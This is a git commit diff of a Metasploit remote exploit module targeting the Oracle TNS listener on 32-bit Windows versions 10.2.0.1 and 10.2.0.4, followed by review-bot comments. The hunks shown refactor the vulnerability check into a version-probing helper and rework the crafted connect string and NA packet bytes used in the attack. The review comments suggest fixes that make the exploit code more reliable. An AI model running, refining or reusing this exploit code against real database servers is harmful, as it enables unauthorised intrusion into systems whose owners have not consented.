fixed version command, check function
git-svn-id: file:///home/svn/framework3/trunk@8182 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e8048704be
commit
97c3159293
|
@ -73,27 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
connect
|
||||
version = "(CONNECT_DATA=(COMMAND=VERSION))"
|
||||
pkt = tns_packet(version)
|
||||
sock.put(pkt)
|
||||
sock.get_once
|
||||
res = sock.get_once(-1, 1)
|
||||
disconnect
|
||||
|
||||
print_status("Oracle version reply: " + res)
|
||||
if (res)
|
||||
return Exploit::CheckCode::Vulnerable if (res =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
|
||||
return Exploit::CheckCode::Vulnerable if (res =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
|
||||
version = tns_version
|
||||
if (not version)
|
||||
raise RuntimeError, "Unable to detect version!"
|
||||
end
|
||||
|
||||
print_status("Oracle version reply: " + version)
|
||||
return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
|
||||
return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
mytarget = nil
|
||||
if target.name =~ /Automatic/
|
||||
|
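Review bot: A probe that gets no reply is turned into an exception at `raise RuntimeError, "Unable to detect version!"`, so a target that times out or closes the connection makes `check` abort instead of reporting a result; `return Exploit::CheckCode::Unknown unless version` gives the caller the same information without unwinding the stack. The two Vulnerable branches differ only in the patch-level digit and collapse into one pattern, `return Exploit::CheckCode::Vulnerable if version =~ /32-bit Windows: Version 10\.2\.0\.[14]\.0/`. The final `return Exploit::CheckCode::Safe` is also reached for a reply that carries no version banner at all, where Unknown would be the more accurate answer, but the banner format is not visible in this hunk so that is for the author to confirm. The `check` method is fully contained in this hunk.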
@ -121,10 +114,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Attacking using target \"#{mytarget.name}\"")
|
||||
end
|
||||
|
||||
|
||||
username = rand_text_alphanumeric(0x1c)
|
||||
|
||||
connect
|
||||
|
||||
print_status("Sending NSPTCN packet ...")
|
||||
nsptcn_pkt = tns_packet("(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))")
|
||||
connect_data = "" +
|
||||
"(DESCRIPTION=" +
|
||||
"(CONNECT_DATA=" +
|
||||
"(SERVICE_NAME=orcl)" +
|
||||
"(CID=" +
|
||||
"(PROGRAM=client.exe)" +
|
||||
"(HOST=client_host)" +
|
||||
")" +
|
||||
")" +
|
||||
"(ADDRESS=" +
|
||||
"(PROTOCOL=TCP)" +
|
||||
"(PORT=1521)" +
|
||||
")" +
|
||||
")"
|
||||
nsptcn_pkt = tns_packet(connect_data)
|
||||
sock.put(nsptcn_pkt)
|
||||
|
||||
# read NSPTRS
|
||||
|
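Review bot: `connect_data` is assembled from a dozen `+`-joined one-token literals starting from `"" +`, which buys nothing over a plain literal; adjacent string literals are joined at parse time, so `connect_data = "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)))" \` followed by `"(ADDRESS=(PROTOCOL=TCP)(PORT=1521)))"` keeps the two halves readable without the runtime concatenations. The port in `(PORT=1521)` is a literal while the module's own connection honours the RPORT option; if the listener compares the two, `(PORT=#{rport})` is the consistent choice, but whether it does is not visible here. `username = rand_text_alphanumeric(0x1c)` is assigned in this hunk and not referenced within it; the `exploit` body continues past the hunk so it may be consumed later, but if the USER= field dropped from the old connect string was its only consumer the assignment is now dead. The `exploit` method starts before and ends after this hunk.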
@ -138,7 +148,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# send NA
|
||||
print_status("Sending NA packet ...")
|
||||
na_stuff = "\xDE\xAD\xBE\xEF\x00\x92" +
|
||||
na_stuff = [0xdeadbeef].pack('N') +
|
||||
"\x00\x92" +
|
||||
"\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00" +
|
||||
"\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71" +
|
||||
"\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00" +
|
||||
|
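Review bot: The rewrite packs the leading marker with `[0xdeadbeef].pack('N')` but the same four bytes still appear as the literal `\xDE\xAD\xBE\xEF` in the fragment two lines further down, so the buffer now spells one value two ways; a local such as `cookie = [0xdeadbeef].pack('N')` used at both positions keeps them in step. On Ruby 1.9 and later `pack` yields an ASCII-8BIT string while `"\x00\x92"` takes the source file's encoding, and joining two non-ASCII strings of different encodings raises Encoding::CompatibilityError unless the file declares a binary encoding; no such magic comment is visible in this chunk, so that is worth confirming before mixing the two forms. The `na_stuff` expression continues past the end of the hunk.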
@ -214,6 +225,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
def tns_version
|
||||
connect
|
||||
version = "(CONNECT_DATA=(COMMAND=VERSION))"
|
||||
pkt = tns_packet(version)
|
||||
sock.put(pkt)
|
||||
sock.get_once
|
||||
res = sock.get_once(-1, 1)
|
||||
disconnect
|
||||
return res
|
||||
end
|
||||
|
||||
|
||||
def nsptda_packet(data)
|
||||
pkt = [data.length + 10].pack('n') # NSPHDLEN
|
||||
pkt << [0].pack('n') # NSPHDPSM
|
||||
|
|
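Review bot: `tns_version` calls `connect` and relies on falling through to `disconnect`, so an exception from `sock.put` or either `sock.get_once` leaves the socket open; wrapping the exchange in `begin … ensure disconnect end` releases it on every path. The first `sock.get_once` discards a reply with no comment on what it is, and the second uses a one-second timeout that yields nil on silence; both deserve a line of explanation, since `check` in the first hunk turns that nil into an error. The trailing `return res` is redundant because the last expression is the method's value. The new method lies entirely within the hunk; `nsptda_packet` begins at the hunk's end and continues outside it.
```ruby
def tns_version
  connect
  begin
    sock.put(tns_packet("(CONNECT_DATA=(COMMAND=VERSION))"))
    sock.get_once          # first reply is discarded — NOTE(review): document which TNS packet this is
    sock.get_once(-1, 1)   # nil on a 1s timeout; check() reports that as "unable to detect"
  ensure
    disconnect
  end
end
```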